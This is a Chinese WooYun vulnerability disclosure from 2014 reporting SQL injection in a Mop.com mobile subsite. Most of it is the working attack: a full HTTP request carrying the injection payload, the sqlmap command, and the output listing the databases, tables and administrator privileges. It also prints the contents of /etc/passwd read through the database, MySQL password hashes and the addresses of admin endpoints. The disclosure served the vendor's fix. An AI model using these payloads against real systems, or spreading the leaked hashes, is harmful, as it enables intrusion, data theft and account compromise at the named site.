当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-079393

漏洞标题:猫扑某子站存在SQL注入漏洞

相关厂商:猫扑

漏洞作者: BMa

提交时间:2014-10-15 11:32

修复时间:2014-11-29 11:34

公开时间:2014-11-29 11:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-15: 细节已通知厂商并且等待厂商处理中
2014-10-15: 厂商已经确认,细节仅向厂商公开
2014-10-25: 细节向核心白帽子及相关领域专家公开
2014-11-04: 细节向普通白帽子公开
2014-11-14: 细节向实习白帽子公开
2014-11-29: 细节向公众公开

简要描述:

猫扑某子站存在SQL注入漏洞,权限很大,影响多个数据库

详细说明:

payload:

POST /viewmessage_new.jsp?log=1&mypage=viewmessage_new.jsp&ufstr=141325665400905&uid=2042281654&uidt=2084414119&version=5 HTTP/1.1
Content-Length: 143
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://m.mop.com:80/
Cookie: mop3gVer=5; _mopwap_UID_T=2084414119; _mopwap_UVSTR=141325665400905; JSESSIONID=aaalWnp4J2Ntkf5YsQmKu; Hm_lpvt_c79a5e83b67cd45de49f406d0471da1b=1413257272; Hm_lvt_c79a5e83b67cd45de49f406d0471da1b=1413257272; _mopwapuuid=b940d441-563a-407e-82d8-7a1396e7bf55;
Host: m.mop.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
curpage=1&email1=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/


方法:

root@kali:~# sqlmap -r '/root/Desktop/2'  --data="curpage=1&email1=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/"
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] n
Are you sure you want to continue? [y/N] y


详细信息:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: email1
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: curpage=1&email1=(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/' AND 8260=8260 AND 'CKtN'='CKtN
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: curpage=1&email1=(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/' AND SLEEP(5) AND 'lire'='lire
---
[15:01:13] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0.11
[15:01:13] [INFO] fetching current database
[15:01:13] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:01:13] [INFO] retrieved:
[15:01:15] [WARNING] reflective value(s) found and filtering out
mop
current database: 'mop'
[15:01:29] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 13 times
[15:01:29] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/m.mop.com'
available databases [8]:
[*] app
[*] focus
[*] information_schema
[*] mop`
[*] mysql
[*] performance_schema
[*] test
[*] userlog
current user: 'wapuser@10.%'


Database: mop
[211 tables]
+-------------------------------------+
| Login_MP_Receive |
| UserBusiness_201101 |
| UserBusiness_201102 |
| UserBusiness_201103 |
| UserBusiness_201104 |
| UserBusiness_201105 |
| UserBusiness_201106 |
| UserBusiness_201107 |
| UserBusiness_201108 |
| UserBusiness_201109 |
| UserBusiness_201110 |
| UserBusiness_201111 |
| UserBusiness_201112 |
| UserBusiness_201201 |
| UserBusiness_201202 |
| UserBusiness_201203 |
| UserBusiness_201204 |
| UserBusiness_201205 |
| UserBusiness_201206 |
| UserBusiness_201207 |
| UserBusiness_201208 |
| UserBusiness_201209 |
| UserBusiness_201210 |
| UserBusiness_201211 |
| UserBusiness_201212 |
| UserBusiness_201301 |
| UserBusiness_201302 |
| UserBusiness_201303 |
| UserBusiness_201304 |
| UserBusiness_201305 |
| UserBusiness_201306 |
| UserBusiness_201307 |
| UserBusiness_201308 |
| UserBusiness_201309 |
| UserBusiness_201310 |
| UserBusiness_201311 |
| UserBusiness_201312 |
| UserBusiness_201401 |
| UserBusiness_201402 |
| UserBusiness_201403 |
| UserBusiness_201404 |
| UserBusiness_201405 |
| UserBusiness_201406 |
| UserBusiness_201407 |
| UserBusiness_201408 |
| UserBusiness_201409 |
| UserBusiness_201410 |
| UserOperate_201201 |
| UserOperate_201202 |
| UserOperate_201203 |
| UserOperate_201204 |
| UserOperate_201205 |
| UserOperate_201206 |
| UserOperate_201207 |
| UserOperate_201208 |
| UserOperate_201209 |
| UserOperate_201210 |
| UserOperate_201211 |
| UserOperate_201212 |
| UserOperate_201301 |
| UserOperate_201302 |
| UserOperate_201303 |
| UserOperate_201304 |
| UserOperate_201305 |
| UserOperate_201306 |
| UserOperate_201307 |
| UserOperate_201308 |
| UserOperate_201309 |
| UserOperate_201310 |
| UserOperate_201311 |
| UserOperate_201312 |
| UserOperate_201401 |
| UserOperate_201402 |
| UserOperate_201403 |
| UserOperate_201404 |
| UserOperate_201405 |
| UserOperate_201406 |
| UserOperate_201407 |
| UserOperate_201408 |
| UserOperate_201409 |
| UserOperate_201410 |
| 3g_edit_sublist2 |
| 3g_edit_sublist |
| 3g_hotclick_info |
| 3g_hotclick_statistic |
| 3g_huodong_view |
| 3g_huodong_views_syn_list |
| 3g_huodong_views |
| 3g_investigate1_detail |
| 3g_tjzq_list_hisbak |
| 3g_tjzq_list |
| 3g_topRegion |
| 3gpet_enter |
| 3gpet_mm_record |
| admin_Lefttree |
| admin_data_review |
| admin_operator_permission |`
| article |
| article_info |
| audit_images |
| audit_images_20100720 |
| audit_images_process |
| audit_images_source |
| baidu_keywords |
| business_detail |
| business_detail_20100720 |
| business_text |
| checkin |
| client_statistics |
| day_receive_login_mp |
| day_receive_login_mpBK1105 |
| day_statistic_normal |
| email_record |
| hi_send_log |
| hot_column |
| hozom_bind |
| huati_table |
| huati_table_tbak |
| huati_table_wcup |
| huodong_table_3g |
| image_monitor_log |
| ipdata |
| keywords_2009 |
| login_times_patch |`
| mobile_area |
| mobile_bind |
| mobile_bind_tmp |
| mobile_up_message |
| monthData |
| mp_limit |
| mp_limit_dzh2 |
| mp_tmp |
| mp_tmp2 |
| mp_tmp_ok |
| passport_delete_user |`
| passport_delete_user_1 |
| passport_delete_user_tmp |
| postReplyStatistics |
| progress |
| purge_pic_upload3_postimg1 |
| quote_reply |
| quote_reply2 |
| recent_subject |
| refere_login_temp |
| refere_reg_temp |
| refere_statistics |
| refere_statistics_temp |
| referer_domain |
| reg_login_num |
| reg_login_num2 |
| reg_login_num_week |
| register_return_dzh |
| register_return_dzh2 |
| register_return_dzh_week |
| request_header_info |
| request_header_notwap |
| send_feed |
| shualiang |
| shualiang_group |
| stat_page_href |
| statistic_back_login |
| statistic_login_idlist |
| statistic_reg_convert |
| statistic_reg_idlist |
| statistic_source |
| statistics |
| statistics_new |
| stockReward |
| subject_key |
| temp_focus |
| tmp_2 |
| topic_subject |
| torch_application |
| torch_union |
| unionSubReward |
| unionSubRewardRec |
| union_login_total |
| url_counter |
| usermessage |`
| usermessage0 |
| usermessage_info |
| uv_statistics |
| wap_auth_user |`
| wap_auth_user_path |
| wap_auth_user_temp |
| wap_auto_login |
| wap_auto_login20110907 |
| wap_auto_login_path |
| wap_hotclick_statistic |
| wap_site_info |
| wap_site_linkOutStatistics |
| wap_site_linkOutStatistics_baksLink |
| wap_site_statistics |
| wap_system_prop |`
| wap_time_statistic |
| wap_user_equip |
| wap_user_ext |
| wap_user_mobile |`
| wap_user_prop |
| wap_user_set |
| wap_user_telnum |
| wl_mobile_statistics |
| wl_statirtics |
| wl_time_statistics |
| wl_time_statistics_backup20120221 |
| wl_time_statistics_bak120531 |
| wl_time_statistics_bak121026 |
| wl_uv_statistics |
| xn_connector |
| xn_reg |
| xn_reg_bak_091104 |
+-------------------------------------+


Database: mop
Table: wap_auth_user
[12 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| time | datetime |
| block_order | varchar(100) |
| block_show_num | varchar(100) |
| font_size | int(11) |
| login_key | varchar(200) |
| login_times | int(11) |
| mp | int(10) |
| show_num | int(11) |
| show_pic | int(11) |
| user_id | int(11) |
| user_name | varchar(100) |
| wc_show_num | int(11) |
+----------------+--------------+


数据库权限以及范围:

database management system users privileges:
[*] %% (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
privilege: USAGE
[*] %beauty% [1]:
privilege: REPLICATION SLAVE
[*] %root% (administrator) [27]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] %slave% (administrator) [27]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] %wapuser% (administrator) [27]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE


select load_file('/etc/passwd');:    'root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\nuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\ngames:x:12:100:games:/usr/games:/sbin/nologin\ngopher:x:13:30:gopher:/var/gopher:/sbin/nologin\nftp:x:14:50:FTP User:/var/ftp:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\ndbus:x:81:81:System message bus:/:/sbin/nologin\nvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin\nabrt:x:173:173::/etc/abrt:/sbin/nologin\nhaldaemon:x:68:68:HAL daemon:/:/sbin/nologin\nntp:x:38:38::/etc/ntp:/sbin/nologin\nsaslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin\npostfix:x:89:89::/var/spool/postfix:/sbin/nologin\narpwatch:x:77:77::/var/lib/arpwatch:/sbin/nologin\nsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin\nuuidd:x:498:499:UUID generator helper daemon:/var/lib/libuuid:/sbin/nologin\ntcpdump:x:72:72::/:/sbin/nologin\nnscd:x:28:28:NSCD Daemon:/:/sbin/nologin\nmysql:x:497:498:MySQL server:/var/lib/mysql:/bin/bash\n'


后台:

后台:http://m.mop.com/admin/login.jsp
数据库帐号:<code>select user,password from mysql.user; [13]:
[*] beauty,
[*] wapuser,
[*] slave,
[*] wapuser,
[*] slave,
[*] wapuser,
[*] root, *2726FA9A20F4078869AB791D5D12DF114D62CAFD
[*] root, *2726FA9A20F4078869AB791D5D12DF114D62CAFD
[*] , *0A47FEBA14D5BD3E670DFAEF4EB3F4D506B4901F
[*] root, *2726FA9A20F4078869AB791D5D12DF114D62CAFD
[*] , *0A47FEBA14D5BD3E670DFAEF4EB3F4D506B4901F
[*] root, *9DFF44DFF4007B348C4AC352751C6AAE5B562A8C
[*] wapuser, *2726FA9A20F4078869AB791D5D12DF114D62CAFD


系统管理员入口:http://m.mop.com/test/server_rsh.jsp</code>
可以拿到shell,也可以拖库<这两个都没做,不深入>

漏洞证明:

1.png


2.png


3.png


4.png


5.png


6.png


7.png


8.png

修复方案:

平常也喜欢逛猫扑,要是有个礼物就好了
1,代码做好过滤
2,数据库权限设置
3,后台访问限制
4,系统帐号限制,不然可以读到某些文件

版权声明:转载请注明来源 BMa@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-10-15 17:14

厂商回复:

谢谢,非常感谢!

最新状态:

暂无


漏洞评价:

评论